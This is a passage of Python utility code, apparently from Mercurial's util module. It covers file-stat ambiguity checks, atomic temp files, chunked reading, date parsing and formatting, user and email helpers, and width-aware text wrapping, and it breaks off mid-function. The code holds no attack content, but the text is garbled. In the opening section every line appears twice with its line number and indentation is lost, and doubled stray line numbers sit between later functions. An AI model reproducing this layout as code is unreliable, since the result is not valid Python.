1587 pass
1587 pass
1588 try:
1588 try:
1589 return self.stat is None and old.stat is None
1589 return self.stat is None and old.stat is None
1590 except AttributeError:
1590 except AttributeError:
1591 return False
1591 return False
1592
1592
1593 def isambig(self, old):
1593 def isambig(self, old):
1594 """Examine whether new (= self) stat is ambiguous against old one
1594 """Examine whether new (= self) stat is ambiguous against old one
1595
1595
1596 "S[N]" below means stat of a file at N-th change:
1596 "S[N]" below means stat of a file at N-th change:
1597
1597
1598 - S[n-1].ctime < S[n].ctime: can detect change of a file
1598 - S[n-1].ctime < S[n].ctime: can detect change of a file
1599 - S[n-1].ctime == S[n].ctime
1599 - S[n-1].ctime == S[n].ctime
1600 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1600 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1601 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1601 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1602 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1602 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1603 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1603 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1604
1604
1605 Case (*2) above means that a file was changed twice or more at
1605 Case (*2) above means that a file was changed twice or more at
1606 same time in sec (= S[n-1].ctime), and comparison of timestamp
1606 same time in sec (= S[n-1].ctime), and comparison of timestamp
1607 is ambiguous.
1607 is ambiguous.
1608
1608
1609 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1609 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1610 timestamp is ambiguous".
1610 timestamp is ambiguous".
1611
1611
1612 But advancing mtime only in case (*2) doesn't work as
1612 But advancing mtime only in case (*2) doesn't work as
1613 expected, because naturally advanced S[n].mtime in case (*1)
1613 expected, because naturally advanced S[n].mtime in case (*1)
1614 might be equal to manually advanced S[n-1 or earlier].mtime.
1614 might be equal to manually advanced S[n-1 or earlier].mtime.
1615
1615
1616 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1616 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1617 treated as ambiguous regardless of mtime, to avoid overlooking
1617 treated as ambiguous regardless of mtime, to avoid overlooking
1618 by confliction between such mtime.
1618 by confliction between such mtime.
1619
1619
1620 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1620 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1621 S[n].mtime", even if size of a file isn't changed.
1621 S[n].mtime", even if size of a file isn't changed.
1622 """
1622 """
1623 try:
1623 try:
1624 return (self.stat.st_ctime == old.stat.st_ctime)
1624 return (self.stat.st_ctime == old.stat.st_ctime)
1625 except AttributeError:
1625 except AttributeError:
1626 return False
1626 return False
1627
1627
1628 def avoidambig(self, path, old):
1628 def avoidambig(self, path, old):
1629 """Change file stat of specified path to avoid ambiguity
1629 """Change file stat of specified path to avoid ambiguity
1630
1630
1631 'old' should be previous filestat of 'path'.
1631 'old' should be previous filestat of 'path'.
1632
1632
1633 This skips avoiding ambiguity, if a process doesn't have
1633 This skips avoiding ambiguity, if a process doesn't have
1634 appropriate privileges for 'path'. This returns False in this
1634 appropriate privileges for 'path'. This returns False in this
1635 case.
1635 case.
1636
1636
1637 Otherwise, this returns True, as "ambiguity is avoided".
1637 Otherwise, this returns True, as "ambiguity is avoided".
1638 """
1638 """
1639 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1639 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1640 try:
1640 try:
1641 os.utime(path, (advanced, advanced))
1641 os.utime(path, (advanced, advanced))
1642 except OSError as inst:
1642 except OSError as inst:
1643 if inst.errno == errno.EPERM:
1643 if inst.errno == errno.EPERM:
1644 # utime() on the file created by another user causes EPERM,
1644 # utime() on the file created by another user causes EPERM,
1645 # if a process doesn't have appropriate privileges
1645 # if a process doesn't have appropriate privileges
1646 return False
1646 return False
1647 raise
1647 raise
1648 return True
1648 return True
1649
1649
1650 def __ne__(self, other):
1650 def __ne__(self, other):
1651 return not self == other
1651 return not self == other
1652
1652
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods: file-object API forwards straight to the
        # temporary file handle
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Flush and rename the temporary file over the permanent name."""
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # when checkambig is set, capture the pre-rename stat so we
            # can detect an "ambiguous" (stat-identical) replacement below
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Throw away all writes: delete the temp file, never rename."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard if the with-block raised
        if exctype is not None:
            self.discard()
        else:
            self.close()
1715
1715
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remover = tryunlink if ignoremissing else unlink
    remover(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1727
1727
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        # a missing file is expected and fine; anything else is real
        if e.errno == errno.ENOENT:
            return
        raise
1735
1735
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # ENOENT: a parent is missing; create it recursively, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without success; give up
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    # chmod only after creation so the mode is not masked by umask
    if mode is not None:
        os.chmod(name, mode)
1763
1763
def readfile(path):
    """Return the full binary content of the file at *path*."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
1767
1767
def writefile(path, text):
    """Replace the content of the file at *path* with the bytes *text*."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
1771
1771
def appendfile(path, text):
    """Append the bytes *text* to the end of the file at *path*."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
1775
1775
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # cap individual chunks at 256k (2**18) so a single huge
            # chunk cannot blow up memory in read() below
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # byte offset already consumed from the chunk at queue[0]
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
1855
1855
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # nbytes == 0 short-circuits, so we never issue a zero-length read
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
1876
1876
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    # the offset is the gap between naive-UTC and naive-local renderings
    # of the same instant
    utcview = datetime.datetime.utcfromtimestamp(timestamp)
    localview = datetime.datetime.fromtimestamp(timestamp)
    delta = utcview - localview
    tz = delta.days * 86400 + delta.seconds
    return timestamp, tz
1889
1889
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # expand %z/%1/%2 into the numeric UTC offset ourselves; a
        # positive 'tz' means west of UTC, hence the flipped sign
        sign = (tz > 0) and "-" or "+"
        minutes = abs(tz) // 60
        q, r = divmod(minutes, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    d = t - tz
    # clamp to the signed 32-bit range before conversion (see doctests)
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
    return s
1925
1925
def shortdate(date=None):
    """turn (timestamp, tzoff) tuple into iso 8631 date."""
    isofmt = '%Y-%m-%d'
    return datestr(date, format=isofmt)
1929
1929
def parsetimezone(s):
    """find a trailing timezone, if any, in string, and return a
    (offset, remainder) pair"""

    # named zones: both are exactly UTC
    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = 1 if s[-5] == "+" else -1
        hours = int(s[-4:-2])
        minutes = int(s[-2:])
        # internal offsets are negated relative to the printed sign
        return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = 1 if s[-6] == "+" else -1
        hours = int(s[-5:-3])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-6]

    # no recognizable timezone suffix
    return None, s
1957
1957
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        # a group like "mb" matches if format contains %m OR %b
        found = [True for p in part if ("%"+p) in format]
        if not found:
            # append "@<default>" and teach the format to parse it
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
1990
1990
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(b' today ') == parsedate(\
                                  datetime.date.today().strftime('%b %d'))
    True
    >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
                                               datetime.timedelta(days=1)\
                                              ).strftime('%b %d'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        # already parsed
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    # symbolic dates (both the English literal and its translation)
    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime('%b %d')
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime('%b %d')

    try:
        # fast path: "unixtime offset" pair of integers
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0:1] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # try each candidate format until one parses
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2067
2067
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # earliest timestamp the (possibly partial) date could mean
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # latest timestamp the (possibly partial) date could mean;
        # probe month lengths 31/30/29 before falling back to 28
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except Abort:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # "-N": within the last N days
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # inclusive range "A to B"
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        # bare date: match anywhere within its span of accuracy
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2143
2143
def stringmatcher(pattern, casesensitive=True):
    """
    Accept a string, possibly carrying a 're:' or 'literal:' prefix, and
    return a (kind, pattern, matcher) triple.  A missing or unrecognized
    prefix means literal matching.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            regex = remod.compile(pattern, 0 if casesensitive else remod.I)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    if pattern.startswith('literal:'):
        pattern = pattern[8:]
    if casesensitive:
        match = pattern.__eq__
    else:
        # compare case-folded forms via the local encoding
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2202
2202
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # drop everything from the '@' onwards
    idx = user.find('@')
    if idx >= 0:
        user = user[:idx]
    # "Real Name <login" style: keep what follows the '<'
    idx = user.find('<')
    if idx >= 0:
        user = user[idx + 1:]
    # then truncate at the first space, then at the first dot
    for sep in (' ', '.'):
        idx = user.find(sep)
        if idx >= 0:
            user = user[:idx]
    return user
2218
2218
def emailuser(user):
    """Return the user portion of an email address."""
    # strip the domain part, then any "Real Name <" prefix
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    return user
2228
2228
def email(author):
    '''get email of author.'''
    # slice between '<' and '>'; with no '<', find() returns -1 and the
    # slice starts at index 0, with no '>' it runs to the end of author
    end = author.find('>')
    if end < 0:
        end = None
    return author[author.find('<') + 1:end]
2235
2235
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display.

    Delegates to encoding.trim() so the cut is width-aware; trimmed text
    ends with '...'.
    """
    return encoding.trim(text, maxlength, ellipsis='...')
2239
2239
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def formatter(count):
        # pick the first row whose threshold (divisor * multiplier) the
        # magnitude reaches; the last row is the unconditional fallback
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        return unittable[-1][2] % count

    return formatter
2250
2250
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    # reject empty/reversed ranges and 0-based input (lines are 1-based)
    if fromline > toline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline
2271
2271
# Render a byte count with a human-readable unit.  Rows are ordered from
# the largest unit down; three rows per unit keep ~3 significant digits
# (e.g. "1.23 GB", "12.3 GB", "123 GB").  The final row is the plain-bytes
# fallback used by unitcountfn() when nothing else matches.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2284
2284
# A single end-of-line: an LF optionally preceded by any number of CRs,
# so repeated CRs before an LF collapse into one EOL.  Old Macintosh
# files (bare CR) are deliberately unsupported; a stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    """Normalize every end-of-line in s to a bare LF."""
    return _eolre.sub('\n', s)

def tocrlf(s):
    """Normalize every end-of-line in s to CRLF."""
    return _eolre.sub('\r\n', s)
2295
2295
# Bind the OS-native EOL converters once at import time: on Windows
# (os.linesep == '\r\n') data actually needs converting, elsewhere the
# identity function avoids a pointless regexp pass.
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2302
2302
def escapestr(s):
    """Backslash-escape a byte string (e.g. a newline becomes '\\n').

    codecs.escape_encode is the function underlying
    s.encode('string_escape') on Python 2; calling it directly also works
    on Python 3, where the 'string_escape' codec was removed.
    """
    return codecs.escape_encode(s)[0]

def unescapestr(s):
    """Undo escapestr(): decode backslash escapes in a byte string."""
    return codecs.escape_decode(s)[0]
2310
2310
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy: round-trip through str() and the
        # local encoding instead of failing outright
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2319
2319
def uirepr(s):
    """repr() variant for user display: collapse the doubled backslashes
    repr() produces (ugly for Windows paths) back into single ones."""
    return repr(s).replace('\\\\', '\\')
2323
2323
# delay import of textwrap
def MBTextWrapper(**kwargs):
    """Build a width-aware textwrap.TextWrapper subclass and return an
    instance configured with **kwargs.

    On the first call the class is created and the module-level name
    MBTextWrapper is rebound to it (see the 'global' statement below), so
    later calls construct instances without re-executing the class body.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr at the largest prefix fitting in space_left
            # display columns (per-character width via encoding.ucolwidth).
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # cache the class: rebind the module-level name so the class body
    # above runs only once per process
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2427
2427
def wrap(line, width, initindent='', hangindent=''):
    """Wrap a byte-string line to at most width display columns.

    initindent prefixes the first output line, hangindent the subsequent
    ones.  Text is decoded to unicode (local encoding) for width-aware
    wrapping by MBTextWrapper, then re-encoded before returning.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2443
2443
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # Read with os.read (retrying on EINTR) and re-split into lines.
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
